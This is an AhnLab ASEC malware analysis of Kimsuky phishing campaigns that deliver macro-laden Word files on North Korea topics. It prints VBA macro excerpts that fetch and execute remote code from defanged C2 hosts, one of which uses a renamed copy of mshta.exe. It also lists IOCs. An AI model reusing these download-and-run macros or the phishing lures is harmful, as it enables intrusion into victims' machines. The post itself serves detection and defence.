Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

The ASEC analysis team has discovered the continuous distribution of malicious Word files with North Korea-related materials. The types of discovered Word files included the one discussed in the “Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files” (AhnLab TIP) and ‘Word Files Related to Diplomacy and National Defense Being Distributed‘. Also, there was also a type using mshta.

The malicious Word files are distributed in various names as shown below.

  • CV of Kim **(Korean American Organization of **,220711).doc
  • Yang**_** Foundation interim report(220716).doc
  • Consultation Request.doc

  • Type 1

The malicious Word file titled ‘Consultation Request.doc’ was most likely distributed through the email shown below. The attacker impersonated a person from a Korean organization to send an email requesting a consultation for a report.

First attack email (without attachments)

The first attack email does not have any attachments. Only when a user responds favorably to the email does the attacker sends a reply with a URL for the user to download a malicious Word file.

Attacker’s reply when a user declined the request (no URL included)

Second attack email sent when a user accepted the request (URL for downloading a Word file included)

Clicking the link on the second email will display a webpage containing another malicious URL.

Webpage prompting users to access another malicious URL

Clicking the download button will redirect the user to hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<omitted>rtnurl=aHR0cHM6Ly9kb2NzLmdv<omitted>. The URL cannot be currently accessed. Yet judging from the URL, it is likely that it collected login information of users and downloaded a malicious Word file from the rtnurl parameter value.

Opening the Word file will show an image asking users to enable macros by clicking the Enable Content button. If users comply, the file displays texts related to a consultation request, making it difficult to realize its malicious features.

Prompting users to enable content

Page displayed upon enabling content

The file contains a VBA macro that connects to a certain URL. Here are some parts of the macro code below.

Sub <strong>Reserve</strong>(pth)
    Documents.Add
    cnt = "On Error Resume Next:Set mx = CreateObje" & "ct(""Microsoft.XMLHTTP""):mx.open ""GET"", ""hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"

Sub <strong>AutoOpen</strong>()
    On Error Resume Next
    pw = "1qaz2wsx"
    Weed pw

    obt = "winmgmts:win32_process" 
Set wm = <strong>GetObject</strong>(obt)
        pth = <strong>Templates</strong>(1).Path & "\version.ini"
        cd = "wscript.exe //e:vbscript //b"
wm.Create cd & pth

End Sub

When the macro is run, it creates version.ini in the AppData\Roaming\Microsoft\Templates folder. It then runs the created ini file through wscript.exe.

  • wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini
On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)

version.ini

As the URL cannot be currently accessed, it is impossible to know what the macro does after. It likely engaged in malicious behaviors such as leaking user PC information as mentioned in the previous post ‘Word Document Attack Targeting Companies Specialized in Carbon Emissions‘.

  • Type 2

Type 2 is distributed with a file related to a specific webinar and accesses C2 through mshta. Similar to Type 1, the Word file shows an image prompting users to enable macros. If users do so, the file shows a following text related to the webinar with a topic of North Korea.

Page displayed upon enabling content

The file also contains a VBA macro, which is shown below.

Sub <strong>AutoOpen</strong>()

jsfds = "cmd /c copy %windir%\system32\mshta.exe %tmp%\gtfmon.exe"
Shell jsfds, 0

jsfds = "cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php"
Shell jsfds, 0

End Sub

When the macro is run, it copies mshta.exe in the TEMP folder as gtfmon.exe and attempts to access a certain URL using the cmd command.

  • cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php

Again, the URL cannot be currently accessed and further behaviors cannot be confirmed. Similar to Type 1, the macro likely performed malicious behaviors such as leaking user PC information.

As malicious Word files containing North Korea-related materials are continuously being discovered, users need to take caution. Since attackers are distributing malicious files by impersonating normal users, one should check the email address of the sender and take caution when opening attachments and clicking links.

[File Detection]
Downloader/DOC.Kimsuky

[IOC]
357ef37979b02b08120895ae5175eb0a (doc)
7fe055d5aa72bd50470da61985e12a8a (doc)
hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1
hxxp://freunkown1.sportsontheweb[.]net/h.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:, ,

5 1 vote
Article Rating
guest

0 Comments
Inline Feedbacks
View all comments